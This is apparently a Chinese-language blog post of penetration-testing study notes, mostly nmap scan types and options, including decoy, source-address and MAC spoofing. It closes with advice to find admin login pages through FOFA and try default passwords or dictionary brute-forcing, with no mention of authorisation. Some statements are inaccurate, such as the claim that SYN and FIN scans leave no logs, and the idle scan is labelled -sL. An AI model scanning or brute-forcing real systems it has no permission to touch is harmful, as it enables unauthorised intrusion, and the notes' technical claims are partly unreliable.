<p>检测活在网络上的主机（主机发现）<br>检测主机上开放的端口（端口发现或枚举）<br>检测到相应的端口（服务发现）的软件和版本<br>检测操作系统，硬件地址，以及软件版本<br>检测脆弱性的漏洞（Nmap的脚本）</p>
<p>可参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/jjj-fly/p/6700118.html">https://www.cnblogs.com/jjj-fly/p/6700118.html</a></p>
<p>扫描单一的一个主机，命令如下：</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">nmap</span> <span class="hljs-number">192.168.1.2</span><br></code></pre></td></tr></table></figure>

<p>扫描特定主机上的80,21,23端口,命令如下</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">nmap</span> -p80,<span class="hljs-number">21</span>,<span class="hljs-number">23</span> <span class="hljs-number">192.168.1.1</span><br></code></pre></td></tr></table></figure>

<p>如果远程主机有防火墙，IDS和IPS系统，你可以使用-PN命令来确保不ping远程主机，因为有时候防火墙会组织掉ping请求.-PN命令告诉Nmap不用ping远程主机。</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">nmap</span> -O -PN <span class="hljs-number">192.168.1.1</span>/<span class="hljs-number">24</span><br></code></pre></td></tr></table></figure>

<p><strong>Tcp SYN Scan (sS)</strong></p>
<p>这是一个基本的扫描方式,它被称为半开放扫描，因为这种技术使得Nmap不需要通过完整的握手，就能获得远程主机的信息。Nmap发送SYN包到远程主机，但是它不会产生任何会话.因此不会在目标主机上产生任何日志记录,因为没有形成会话。这个就是SYN扫描的优势.</p>
<p>如果Nmap命令中没有指出扫描类型,默认的就是Tcp SYN.但是它需要root&#x2F;administrator权限.</p>
<p><strong>#nmap -sS 192.168.1.1</strong></p>
<p><strong>—————————————–</strong></p>
<p><strong>Tcp connect() scan(sT)</strong></p>
<p>如果不选择SYN扫描,TCP connect()扫描就是默认的扫描模式.不同于Tcp SYN扫描,Tcp connect()扫描需要完成三次握手,并且要求调用系统的connect().Tcp connect()扫描技术只适用于找出TCP和UDP端口.</p>
<p><strong>#nmap -sT 192.168.1.1</strong></p>
<p><strong>—————————————–</strong></p>
<p><strong>Udp scan(sU)</strong></p>
<p>顾名思义,这种扫描技术用来寻找目标主机打开的UDP端口.它不需要发送任何的SYN包，因为这种技术是针对UDP端口的。UDP扫描发送UDP数据包到目标主机，并等待响应,如果返回ICMP不可达的错误消息，说明端口是关闭的，如果得到正确的适当的回应，说明端口是开放的.</p>
<p><strong>#nmap -sU 192.168.1.1</strong></p>
<p><strong>—————————————–</strong></p>
<p><strong>FIN scan (sF)</strong></p>
<p>有时候Tcp  SYN扫描不是最佳的扫描模式,因为有防火墙的存在.目标主机有时候可能有IDS和IPS系统的存在,防火墙会阻止掉SYN数据包。发送一个设置了FIN标志的数据包并不需要完成TCP的握手.，FIN扫描也不会在目标主机上创建日志(FIN扫描的优势之一).</p>
<p><strong># nmap -sF 192.168.1.8</strong></p>
<p><strong>—————————————–</strong></p>
<p><strong>PING Scan (sP)</strong></p>
<p>PING扫描不同于其它的扫描方式，因为它只用于找出主机是否是存在在网络中的.它不是用来发现是否开放端口的.PING扫描需要ROOT权限，如果用户没有ROOT权限,PING扫描将会使用connect()调用.</p>
<p><strong>#nmap -sP 192.168.1.1</strong></p>
<p><strong>——————————————-</strong></p>
<p><strong>版本检测(sV)</strong></p>
<p>版本检测是用来扫描目标主机和端口上运行的软件的版本.它不同于其它的扫描技术，它不是用来扫描目标主机上开放的端口，不过它需要从开放的端口获取信息来判断软件的版本.使用版本检测扫描之前需要先用TCP SYN扫描开放了哪些端口.</p>
<p><strong>#nmap -sV 192.168.1.1</strong></p>
<p><strong>——————————————-</strong></p>
<p><strong>Idle scan (sL)</strong></p>
<p>Idle scan是一种先进的扫描技术，它不是用你真实的主机Ip发送数据包，而是使用另外一个目标网络的主机发送数据包.</p>
<p><strong>#nmap -sL 192.168.1.6 192.168.1.1</strong></p>
<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs diff"><span class="hljs-deletion">-iL: 后加主机ip字典 批量扫描</span><br><span class="hljs-deletion">-iR：选择随机目标主机进行扫描（如 -iR 100 扫描全网随机100个主机）</span><br><span class="hljs-deletion">--exclude:白名单 指定不想扫的主机地址</span><br><span class="hljs-deletion">--excludefile： 后加字典 批量指定白名单中的主机</span><br><span class="hljs-deletion">-sL:列出目标 不进行主机发现</span><br><span class="hljs-deletion">-sn:只ping主机 不扫端口</span><br><span class="hljs-deletion">-Pn:扫描前不需要ping命令若防火墙禁止使用ping，可用此扫描</span><br><span class="hljs-deletion">-PO：使用ip协议进行扫描</span><br><span class="hljs-deletion">--dns-servers: 指定nmap的DNS服务器进行解析</span><br><span class="hljs-deletion">--system-dns：指定系统DNS服务器</span><br><span class="hljs-deletion">--traceroute：路由追踪</span><br><span class="hljs-deletion">-sS:发送SYN包扫描目标主机</span><br><span class="hljs-deletion">-sT:全连接扫描，基于三次握手扫描</span><br><span class="hljs-deletion">-sA:ACK扫描 （可判断有无防火墙）</span><br><span class="hljs-deletion">-sU:发送UDP包探测目标主机</span><br><span class="hljs-deletion">-sI:僵尸扫描</span><br><span class="hljs-deletion">--top-ports &lt;number&gt; :扫描开放概率最高的number个端口</span><br><span class="hljs-deletion">--port-ratio &lt;ratio&gt; :扫描指定频率以上的端口  &lt;radio&gt;为频率</span><br><span class="hljs-deletion">-sV： 进行版本探测</span><br><span class="hljs-deletion">--version-intensity &lt;level&gt;: 指定版本侦测强度（0-9）</span><br><span class="hljs-deletion">-O : 进行系统版本扫描</span><br><span class="hljs-deletion">-T&lt;0-5&gt;:设置定时模板（越高越快）一般用4</span><br><span class="hljs-deletion">--host-timeout &lt;time&gt;: 设置主机超时时间</span><br><span class="hljs-deletion">--scan-delay/--max-scan-delay &lt;time&gt;: 调整扫描之间的延迟</span><br><span class="hljs-deletion">--min-rate &lt;number&gt;: 发送数据包每秒不少于 </span><br><span class="hljs-deletion">--max-rate &lt;number&gt;:发送数据包每秒不多于</span><br><br><span class="hljs-deletion">-D &lt;decoy1,decoy2[,ME],...&gt;:用诱饵掩盖扫描</span><br><span class="hljs-deletion">-S &lt;IP_Address&gt;: 伪造源地址 </span><br><span class="hljs-deletion">-e 指定网卡</span><br><span class="hljs-deletion">--data &lt;hex string&gt;:将自定义负载附加到已发送的数据包（十六进制）</span><br><span class="hljs-deletion">--spoof-mac &lt;mac address/prefix/vendor name&gt;: mac地址/常量/供应商名称&gt;：欺骗您的mac地址 </span><br><br><span class="hljs-deletion">--open: 仅显示打开（或可能打开）的端口</span><br><span class="hljs-deletion">-v:增加详细等级（使用-vv或更多预期更多的效果）</span><br><span class="hljs-deletion">-V：打印版本号</span><br></code></pre></td></tr></table></figure>

<h3 id="小米范"><a href="#小米范" class="headerlink" title="小米范"></a>小米范</h3><p>下载web finder 2.9.jar，拖到java8bin目录下</p>
<p>Java8bin目录执行cmd</p>
<p>输入java -jar web_finder_2.9.jar</p>
<p>在fofa中执行搜索，传递IP至小米范执行</p>
<h3 id="弱注入"><a href="#弱注入" class="headerlink" title="弱注入"></a>弱注入</h3><p>例子：fofa输入title&#x3D;管理，进行尝试admin用户的登录，密码填admin等简单的默认密码，或进行字典暴力爆破</p>

      </section>
      <section class="extra">
        
          <ul class="copyright">
  
    <li><strong>本文作者：</strong>John Doe</li>
    <li><strong>本文链接：</strong><a href="http://example.com/2024/01/18/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/index.html" title="http:&#x2F;&#x2F;example.com&#x2F;2024&#x2F;01&#x2F;18&#x2F;%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86&#x2F;index.html">http:&#x2F;&#x2F;example.com&#x2F;2024&#x2F;01&#x2F;18&#x2F;%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86&#x2F;index.html</a></li>
    <li><strong>版权声明：</strong>本博客所有文章均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" title="BY-NC-SA" target="_blank" rel="noopener">BY-NC-SA</a> 许可协议，转载请注明出处！</li>
  
</ul>
        
        
          <section class="donate">
  <div id="qrcode-donate">
    <img   class="lazyload" data-original="https://pic.izhaoo.com/alipay.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" >
  </div>
  <div class="icon">
    <a href="javascript:;" id="alipay"><i class="iconfont iconalipay"></i></a>
    <a href="javascript:;" id="wechat"><i class="iconfont iconwechat-fill"></i></a>
  </div>
</section>
        
        
        
  <nav class="nav">
    <a href="/2024/01/18/%E5%8D%9A%E5%AE%A2/"><i class="iconfont iconleft"></i>github博客的搭建</a>
    <a href="/2024/01/18/%E5%9F%9F%E5%90%8D%E7%AB%AF%E5%8F%A3/">网安基础（网址解析，汇编语言发展等）vue基础<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#web%E6%89%93%E7%82%B9"><span class="toc-text">web打点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fiddler"><span class="toc-text">fiddler</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%93%E9%9D%B6"><span class="toc-text">打靶</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%9C%E7%B4%A2%E8%A7%84%E5%88%99"><span class="toc-text">搜索规则</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%AF%E4%BB%98%E6%BC%8F%E6%B4%9E"><span class="toc-text">支付漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#pikachu%E6%89%93%E9%9D%B6"><span class="toc-text">pikachu打靶</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#oracle-virtualbox%E6%89%93%E9%9D%B6"><span class="toc-text">oracle virtualbox打靶</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#nmap%E5%91%BD%E4%BB%A4%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-text">nmap命令的使用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B0%8F%E7%B1%B3%E8%8C%83"><span class="toc-text">小米范</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%B1%E6%B3%A8%E5%85%A5"><span class="toc-text">弱注入</span></a></li></ol></li></ol></li></ol>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  

<footer class="footer">
  <div class="footer-social"><a 
        href="tencent://message/?Menu=yes&uin=894519210 "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#12B7F5'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconQQ "></i>
      </a><a 
        href="javascript:; "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#09BB07'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconwechat-fill "></i>
      </a><a 
        href="https://www.instagram.com/izhaoo/ "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#DA2E76'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconinstagram "></i>
      </a><a 
        href="https://github.com/zhaoo "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#9f7be1'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  icongithub-fill "></i>
      </a><a 
        href="mailto:izhaoo@163.com "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#FF3B00" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
  
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
  
    
<script src="/js/color-mode.js"></script>

  
  
</body>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>





  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>






  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.qrcode/1.0/jquery.qrcode.min.js"></script>




<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>







  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>












</html>